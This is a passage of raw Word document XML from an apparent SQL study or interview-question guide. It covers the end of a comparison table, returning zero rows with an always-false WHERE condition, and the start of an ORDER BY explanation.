            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72FDB096" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Yes (in some RDBMS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="6F4FF943" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AFBF1D1" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E789A45" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Full (per row)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03C31D84" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Minimal (page-level)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F815A9" w:rsidRPr="00F815A9" w14:paraId="59D93E69" w14:textId="77777777" w:rsidTr="00F815A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A1A74E6" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14039B9C" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Slower</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69757368" w14:textId="77777777" w:rsidR="00F815A9" w:rsidRPr="00F815A9" w:rsidRDefault="00F815A9" w:rsidP="00F815A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F815A9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Faster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35140C21" w14:textId="37A12984" w:rsidR="000938AB" w:rsidRDefault="00000000" w:rsidP="000938A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D3951FF">
          <v:rect id="_x0000_i2948" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="203123C4" w14:textId="5625C596" w:rsidR="00DD1028" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD1028" w:rsidP="00DD1028">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQL Query - Get Zero records from table having n number of records</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F320FA" w14:textId="3C4325EB" w:rsidR="00DD1028" w:rsidRPr="00DD1028" w:rsidRDefault="00DD1028" w:rsidP="004802A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To get zero records from a table (i.e., return an empty result set) even though the table has N number of records, you can use a condition that is always false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44F562" w14:textId="77777777" w:rsidR="00DD1028" w:rsidRPr="00DD1028" w:rsidRDefault="00DD1028" w:rsidP="00DD1028">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example SQL Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06866CEC" w14:textId="77777777" w:rsidR="00DD1028" w:rsidRPr="00DD1028" w:rsidRDefault="00DD1028" w:rsidP="00DD1028">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT * FROM your_table WHERE 1 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0D55AD" w14:textId="77777777" w:rsidR="00DD1028" w:rsidRPr="00DD1028" w:rsidRDefault="00DD1028" w:rsidP="00DD1028">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CB3AE" w14:textId="77777777" w:rsidR="00DD1028" w:rsidRPr="00DD1028" w:rsidRDefault="00DD1028" w:rsidP="00DD1028">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT * FROM your_table WHERE FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A5C7FD" w14:textId="77777777" w:rsidR="00DD1028" w:rsidRPr="00DD1028" w:rsidRDefault="00DD1028" w:rsidP="00DD1028">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Both queries will return 0 rows, regardless of how many rows exist in the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F63471" w14:textId="77777777" w:rsidR="00DD1028" w:rsidRPr="00DD1028" w:rsidRDefault="00DD1028" w:rsidP="00DD1028">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1028">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Let me know if you want this behavior used inside a stored procedure or view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E28EB9" w14:textId="77777777" w:rsidR="00DD1028" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00DD10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3AB4A7">
          <v:rect id="_x0000_i2949" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A319CBD" w14:textId="0FA43416" w:rsidR="003C0862" w:rsidRPr="00CE4B95" w:rsidRDefault="003C0862">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="699" w:name="_Toc196308179"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is ordered by and range in the database?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="699"/>
    </w:p>
    <w:p w14:paraId="6827BB96" w14:textId="32A1E20E" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY and RANGE in SQL — Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5754473A" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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0853AB5">
          <v:rect id="_x0000_i2950" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D5ED3" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686BADED" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC3ECF"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The ORDER BY clause is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sort the result set</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on one or more columns in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ascending (ASC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>descending (DESC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39023948" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255C4DD5"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ELECT * FROM Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6122B394"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ORDER BY salary DESC, name ASC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B500E62" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1944825F"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orts all rows first by salary in descending order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A35E6"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If salaries are the same, then sorts those rows by name in ascending order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02AC05" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Default Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E1236"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If no direction is specified, </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ASC (ascending)</w:t>
